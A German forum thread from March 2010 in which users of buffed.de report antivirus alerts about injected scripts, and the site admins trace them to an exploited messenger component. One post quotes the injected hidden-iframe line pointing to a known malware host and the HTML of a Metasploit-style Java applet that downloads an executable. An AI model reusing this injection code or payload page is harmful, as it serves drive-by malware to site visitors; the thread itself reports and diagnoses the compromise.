# Viren Meldung von Buffed.de



## Sam_Fischer (19. März 2010)

Hallo,

Ich bekomme in Zwischen jedes mal ne Viren Medlung von GDATA wenn ich auf die Seite von Buffed.de gehe.... 


[attachment=10113:Unbenannt.png]

Das ist woll Falschalarm...


Wollte es den noch sagen. 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Barbarina (19. März 2010)

Sam_Fischer schrieb:


> Hallo,
> 
> Ich bekomme in Zwischen jedes mal ne Viren Medlung von GDATA wenn ich auf die Seite von Buffed.de gehe....
> 
> ...



Hmmm naja aber dein GData spielt verrückt und mein Avast auch!!!

http://www.buffed.de/flashcoms/files/flash.js

HTML:Iframe-inf

Virus/Wurm

100319-0, 19.03.2010

Soo viel dazu ich denke schon das da was nicht ganz sauber ist!

Aber wundern tuts mich auch nicht wirklich, denn Buffed verkommt zu einer Werbeschleuder.


----------



## Skyler93 (19. März 2010)

Das selbe bei mir, hoffe das Buffedteam hilft mal a wengal weiter plz 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


Ein wenig info über den mods, in bearbeitung oder ähnliches würds auch besser machen 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## MasterXoX (19. März 2010)

Bei mir meldet avast auch immer nen Virus.


----------



## Hordlerkiller (19. März 2010)

mein avast sagt es auch buffed macht was


----------



## Tikume (19. März 2010)

Und wenn eure Software nun auch anzeigen würde über welches Skript ...


----------



## Skyler93 (19. März 2010)

Tikume schrieb:


> Und wenn eure Software nun auch anzeigen würde über welches Skript ...



hmm kann ich das i-wo anzeigen lassen? oder kann ich dir sonst i-wie helfen, uns zu helfen? xD


----------



## Blut und Donner (19. März 2010)

> Virus: HTML:Iframe-inf (Engine
> 
> Virus beim Laden von Web-Inhalten gefunden.
> 
> Adresse: www.buffed.de



Bei mir ebenfalls, GDATA safes.

Im Protokoll steht bei mir auch nur:


> Virenprüfung von Web-Inhalten
> 
> Adresse: 	www.buffed.de
> Virus: 	HTML:Iframe-inf (Engine
> Status: 	Der Zugriff wurde verweigert.


----------



## Nicefight (19. März 2010)

Hatte von Avast die gleiche Meldung und das ist bei mir das erste mal hier bei buffed. finde ich doch etwas beunruhigend. Wobei Avast angeblich die Verbindung getrennt werden konnte.


----------



## Detrax (19. März 2010)

Ich kann mich nur anschließend, bin ebenfalls Avast nutzer, sogar Premium und mir wird angezeigt das ebenfalls ein Virus/Wurm innerhalb der Buffed.de Werbung zu finden ist.


----------



## Suga (19. März 2010)

Ich kann mich ebenfalls nur anschließen. Die Meldung kommt immer auf der Startseite www.buffed.de

avast! Warnung
Dateiname: http://www.buffed.de.../files/flash.js
Malware-Name: HTML:Iframe-inf
Malware-Typ: Virus/Wurm
VPS Version 100318-1, 18.03.2010


----------



## PuddingKing (19. März 2010)

habe auch avast .wurde gewarnt habe aber zulangsam getrennt hatte grade einen trojaner drauf aber sofort dateien mit avast gelösct hoffe es is weg.
ist aber nicht das erste mal bei buffed hatt letzten jahr ende oktober nen trojaner der meine ganze festplatte schrott gemacht hatte


----------



## xashija (19. März 2010)

Wir prüfen das


----------



## Rethelion (19. März 2010)

Ein Avast-Besitzer sollte die Datei einfach mal bei Avast einschicken und warten bis er eine Antwort bekommt; wird wahrscheinlich eh ein Fehlalarm sein wenn nur Avast meckert.


----------



## Skyler93 (19. März 2010)

Rethelion schrieb:


> Ein Avast-Besitzer sollte die Datei einfach mal bei Avast einschicken und warten bis er eine Antwort bekommt; wird wahrscheinlich eh ein Fehlalarm sein wenn nur Avast meckert.



G-Data meckert auch

Nehmen wir mal an es were ein trojaner, oder gar ein Keylogger, was würde dann passieren?, wär Buffed schuld?


----------



## Dregodis (19. März 2010)

Me2
http://s8b.directupload.net/file/d/2103/zqg2ufoh_png.htm


----------



## RedShirt (19. März 2010)

document.write("<iframe src=http://www.googleticys.com/ads.asp frameborder=0 width=10 height=1></iframe>");

<-- das wurde in die genannte .js eingeschleust

diese Seite enthält vermutlich schadhafte Software o.ä. ... nette getarnt als falscher Link zu Google Analytics 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

)

Ist ein Fall für die Buffed Admins.

@Moderatoren 
wenn gelesen könnt ihr den Link unkenntlich machen - da der Iframe derzeit bei euch wohl ausgeführt wird, ist öffentlich kein Problem denk ich =)


----------



## Rethelion (19. März 2010)

Skyler93 schrieb:


> G-Data meckert auch
> 
> Nehmen wir mal an es were ein trojaner, oder gar ein Keylogger, was würde dann passieren?, wär Buffed schuld?



GDATA=Avast + Bitdefender


----------



## PuddingKing (19. März 2010)

das ist kein fehlalarm ich hatte grad nen trojaner


----------



## Skyler93 (19. März 2010)

Nehmen wir an es ist ein Trojaner, okay was ist jetz? haben alle bisauf die die Avast haben nun nen Trojaner?
gut das ich mich für das einzig richtige Antivir entschieden hab


----------



## Sam_Fischer (19. März 2010)

PuddingKing schrieb:


> das ist kein fehlalarm ich hatte grad nen trojaner



Der beste... muss Ja Avast scheisse sein... wenn der Den Trojaner Blockt er aber dennoch auf dem PC ist.


----------



## Skyler93 (19. März 2010)

Sam_Fischer schrieb:


> Der beste... muss Ja Avast scheisse sein... wenn der Den Trojaner Blockt er aber dennoch auf dem PC ist.



warum er hat bestimmt net 5.0 xD bei mir hats geblockt und das nun umgefehr 30 mal, und es ist nix durchkommen^^


----------



## Blut und Donner (19. März 2010)

Skyler93 schrieb:


> Nehmen wir an es ist ein Trojaner, okay was ist jetz? haben alle bisauf die die Avast haben nun nen Trojaner?
> gut das ich mich für das einzig richtige Antivir entschieden hab



+ GDATA xD


----------



## RedShirt (19. März 2010)

Narf.



> und es ist nix durchkommen^^



^^ klar, das weißt Du ... sicher bist Du aber leider nicht. Und "das einzig richtige" ist was andres... soviel zu Pauschalisierungen

Kleine Erklärung 
Leute, das ist eine ASP Webseite, die in einem winzigen IFrame aufgerufen wird... diese Seite verweist auf eine HTML Seite, wo eine Exe zum Download angeboten wird.

Der Sourcecode dazu:
 1 <html>
  2    <head></head>
  3    <body>
  4      <applet archive="ccc.jar" code="msf.x.HelloWorld.class" width="1" heigh    t="1">
  5        <param name="data" value="http://ENTFERNT/QC032312.exe"/>
  6        <param name="lhost" value="127.0.0.1"/>
  7        <param name="lport" value="443"/>
  8      </applet>
  9    </body>
 10  </html>

Wird diese ausführbare Datei gestartet, passieren vermutlich keine guten Dinge 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 kann also sehr wohl ein Trojaner o.ä. sein.
Sucht doch mal auf der Platte nach der Datei bzw. in eurem Ordner für temporäre Internetdateien (Cache).

Technikexperten von Buffed können euch dann sicherlich mehr sagen.


----------



## Petu (19. März 2010)

Gleiches Spiel wie in meinem vorherigem Beitrag http://www.buffed.de...d-auf-buffedde/

Nur diesesmal ist es ein Popup, das ich vorher auf dieser Site noch nicht gesehen habe. ( Es ist nicht der Layer ) Meldung von Nod32 bleibt die gleiche.

Euros4Click scheint da etwas anfällig zu sein 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Skyler93 (19. März 2010)

Hmm habt ihr ihn behoben? bei mir kommen keine blockierungen mehr, oder er hat mein avast durchbrochen


----------



## Nebola (19. März 2010)

Skyler93 schrieb:


> gut das ich mich für das einzig richtige Antivir entschieden hab



Haha, ne ist klar.


----------



## Rethelion (19. März 2010)

Skyler93 schrieb:


> Hmm habt ihr ihn behoben? bei mir kommen keine blockierungen mehr, oder er hat mein avast durchbrochen



Da ist nichts durchbrochen, wie auch. Das Script ist auch kein Trojaner sondern nur ein Fehlalarm von Avast.

Der Thread hier betrifft fast dasselbe:http://www.buffed.de/forum/index.php/topic/122218-virus-auf-buffed/


----------



## Skyler93 (19. März 2010)

und wieso meint irgendeiner er hatn trojaner? hää


----------



## Rethelion (19. März 2010)

Skyler93 schrieb:


> und wieso meint irgendeiner er hatn trojaner? hää



Weil er den Trojaner vll zufällig woanders her hat? 
Unter den Buffed-Usern finden sich sicher noch mehr Leute die Trojaner auf dem Rechner haben. 

Wenn nur ein einziges Programm einen Virus erkennt und dieser dann auch noch "Heur" im Namen hat; dann kann man fast immer von einem Fehlalarm ausgehen.


----------



## ZAM (19. März 2010)

Die Meldung wurde leider durch einen alten, für Änderungen anfälligen Codebereich ausgelöst, den wir vor einiger Zeit schon entfernt haben. Aber es war wohl noch irgendwo eingebunden - die Meldung dürfte maximal im mybuffed-Bereich aufgetaucht sein. *Das System dahinter ist jetzt komplett gelöscht.* Die Einbindung des Iframes ist also nicht mehr möglich!

Neben dem Virenscanner sollte die Sicherheitseinstellungen des Browser schon ausreichen, um Java-Ausführungen bzw. ungewünschte Downloads von Inhalten aus IFRAMES heraus zu unterbinden bzw. zu blockieren.



Petu schrieb:


> Gleiches Spiel wie in meinem vorherigem Beitrag http://www.buffed.de...d-auf-buffedde/
> Nur diesesmal ist es ein Popup, das ich vorher auf dieser Site noch nicht gesehen habe. ( Es ist nicht der Layer ) Meldung von Nod32 bleibt die gleiche.
> Euros4Click scheint da etwas anfällig zu sein
> 
> ...



Ist das wieder aufgetaucht oder beziehst du dich noch auf die alte Meldung?


----------



## Petu (19. März 2010)

Ich beziehe mich auf diese Meldung hier.

Wobei es aber der gleiche "googlelitys jss" (oder wie auch immer der Name war). Also das von der "China" Site, wie es in meinem oben verlinkten Beitrag schon der Fall war.

Wie gesagt: Es tauchte aber diesesmal ein "Richtiges" Popup auf, also nicht nur der Layer. Fand ich schon erstaunlich, weil Firefox eigentlich schon recht zuverlässig Popups blockt.


----------



## Skyler93 (19. März 2010)

übrigens grade ist er wieder gekommen und kommt wieder und wieder -.- nervt


----------



## Suga (19. März 2010)

Die erste scheint verschwunden zu sein, aber jetzt kommt ne andere direkt auf der Hauptseite (www.buffed.de):

avast!Warnung

Datei-Name: http://www.buffed.de...admin/latest.js
Malware-Name: HTML:Iframe-inf
Malware-Typ: Virus/Wurm
VPS-Version: 100319-0, 19.03.2010


----------



## Skyler93 (19. März 2010)

stimmt ist ein anderer


----------



## Blut und Donner (19. März 2010)

Also bei mir kommt immernoch die selbe Meldung, aber auch wieder HTML:Iframe-inf (Engine-

Seit wann ist denn bitte GDATA und Avast ein Programm?


----------



## Rethelion (19. März 2010)

Blut schrieb:


> Also bei mir kommt immernoch die selbe Meldung, aber auch wieder HTML:Iframe-inf (Engine-
> 
> Seit wann ist denn bitte GDATA und Avast ein Programm?



GDATA und Avast sind schon zwei verschiedene Programme; aber GDATA benutzt das Engine von Avast(und das von Bitdefender). Also alles was Avast erkennt, wird auch von GDATA erkennt; und natürlich auch andersrum.

Hier ist schonmal die erste Antwort von Avast:


> Hello,
> 
> This is not a false positive. The file in the url you have sent is currently offline, but I have found it from the fp submits -> infection is located at the end of the file, there is an iframe that points to googleticys.com which is known malware distribution server.
> 
> Best Regards


----------



## ZAM (19. März 2010)

Ich sags ja - manchmal ist es besser das Rad neu zu erfinden, statt Thirdparty-Software zu nutzen. Der Site-Messenger war angreifbar - die Restleiden sind entfernt.


----------



## Tb80 (20. März 2010)

War das nun gefährlich? Und was kann man machen, falls man es auf dem Pc hat?


----------



## ZAM (20. März 2010)

Tb80 schrieb:


> War das nun gefährlich?



Ich habs nicht runtergeladen und ausgeführt. 



> Und was kann man machen, falls man es auf dem Pc hat?


Siehe meinen Kommentar oben.


----------



## Fuga89 (21. März 2010)

Also bei mir hat der den virus ganz klar in dem fenster vor buffed.de erkannt.. da wo dieses neue dragon age angezeigt wird... diese seite konnte ich aber auch nicht durch den link "weiter zu buffed.de" üerspringen sondern musste warten bis der alles fertig eingeladen hatte von buffed so dass er dann erst die seite gewechselt hatte


also es war diese vorseite wo ab und zu shakes&fidget angezeigt wird^^ und nicht im mybuffed bereich wenn ich das team richtig verstanden habe
Hab den Virenfund gerade erst angezeigt bekommen


----------



## Skyler93 (21. März 2010)

Malware blockiert
Avast! Web-Schutz hat eine Bedrohung blockiert
Keine Aktion erforderlich
Objekt: http://www.buffed.de/fileadmins/js/buffed-videos-events.js
Infektion: HTML:Iframe-inf
Aktion: Zugriff verweigert
Prozess: C:\Program Files (86)\Mozilla Firefox\firefox.exe

Eine Bedrohung wurde gefunden und beim Dateidownload blockiert

scheint ein neuer da 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Bansai2006 (21. März 2010)

.........einmal mit Profis


----------



## Suga (21. März 2010)

Skyler93 schrieb:


> Malware blockiert
> Avast! Web-Schutz hat eine Bedrohung blockiert
> Keine Aktion erforderlich
> Objekt: http://www.buffed.de...ideos-events.js
> ...



Dem kann ich mich mal wieder nur anschließen. Die Warnung kommt direkt auf der Hauptseite


----------



## tamirok (21. März 2010)

be mir und meinem bruder auch :/


----------



## Rethelion (21. März 2010)

Erkennt jetzt wieder nur Avast:
http://www.virustota...6129-1269180528

@ZAM: Ich kenn mich zwar mit Scripten nicht aus, aber komisch ist, dass in beiden "www.gxxgleticys.com" vorkommt; laut Avast ein Malware Server.


----------



## koolt (21. März 2010)

> Virus: HTML:Iframe-inf
> 
> Virus beim Laden von Web-Inhalten gefunden.
> 
> Adresse: www.buffed.de


Kommt manchmal auf der Startseite von Buffed. Ich benutz Gdata


----------



## Sammies (21. März 2010)

Und Täglich grüßt der Virenscanner die buffed Seite............


----------



## monthy (21. März 2010)

Yo bei mir auch. Avast. Gleiche Meldung.



Naja einfach blockieren und fertig.



Sollte eigentlich nix passieren.



Mfg


----------



## Saji (21. März 2010)

Herrlich, nun wissen wir ja wer an der Trojaner-Flut der letzten Tage schuld ist. 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Achja, das selbe bei mir. Avast meldet sich zu Wort. WoW wird jetzt erst wieder gestartet wenn meine Sicherheitsmaschinerie drübergelaufen ist. Thx buffed! 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## zONzai (23. März 2010)

Immernoch die Virus-Warnung auf der Startpage. Arbeitet da noch wer dran oder bleibt das jetzt so? ^^
Im Ernst, etwas mehr Feedback bzw Info seitens des Buffed Teams kann man doch erwarten, ist ja nicht gerade lustig...


----------



## Valandil2003 (23. März 2010)

Moin,

mir wurde heute schon zweimal dieser Virus gemeldet:


Trojan-GameThief.Win32.WOW.ygd	Datei: C:\Dokumente und Einstellungen\xxx\Anwendungsdaten\Thinstall\Mozilla Firefox\%SystemSystem%\3094375.system	



grüße


----------



## HMC-Pretender (23. März 2010)

Hab hier am Arbeitsplatz SOPHOS, und der meckert auch.


----------



## Bansai2006 (23. März 2010)

Ist schon das 4 oder 5 mal die Woche .

Also ausversehen kann man das nicht mehr nennen.

Glücklicherweise hab ich mit WoW nichts am Hut den da sind sie ja alle hinterher.


----------



## Rethelion (23. März 2010)

Valandil2003 schrieb:


> Trojan-GameThief.Win32.WOW.ygd	Datei: C:\Dokumente und Einstellungen\xxx\Anwendungsdaten\Thinstall\Mozilla Firefox\%SystemSystem%\3094375.system



Das ist aber etwas anderes; such mal die Datei und lad sie bei virustotal.com hoch.


----------



## Basterd (23. März 2010)

Hab seit heute auch mal wieder die Meldung...




			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Leviathan666 (24. März 2010)

Basterd schrieb:


> Hab seit heute auch mal wieder die Meldung...
> 
> 
> 
> ...



Das steht doch dick und breit iframe. Das ist mal wieder ne übertriebene Sicherheitsmaßnahme eures Virenscanners.

Diese Angaben sind ohne Gewähr. Nicht, dass es nachher heißt ich hätte etwas damit zutun! xD


----------



## Saji (25. März 2010)

Same here! 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Bekomme jedes Mal einen halben Herzinfarkt...


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Rethelion (25. März 2010)

Avast ist hier anscheinend zu übervorsichtig.
Schreibt einfach Avast mit eurem Problem an und schaut wie sie reagieren.

@oben: Hier wird das Script komischerweise nicht erkannt, kommt die Meldung vll erst seit dem neusten Update?
http://www.virustotal.com/de/analisis/2abe70791f8b7300eaf8ede433e9233f4fa0a82bb98e94c77458ee41dfeaa5e2-1269499631


----------



## Sam_Fischer (25. März 2010)

Also ich hab keine Probleme mehr. :> dann ist avast komisch. O.o


----------



## Rethelion (25. März 2010)

Ruf mal das Script von dem Screenshot von Saji auf und schau ob GData dann ausschlägt.
Wenn nicht haben sie es entweder schon gepatcht oder GData hat von Avast nicht die neusten Updates.


----------



## Saji (25. März 2010)

Ich weiß nicht was Avast hat, aber das aktuellste Update ist drauf. Hier auf Arbeit am Mitarbeiter-PC schlägt AntiVir zumindest nicht an.

Es ist sicherlich nichts gefährliches, aber es nervt halt tierisch und wirkt für Neue sicherlich nicht sonderlich vertrauenserweckend. 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------

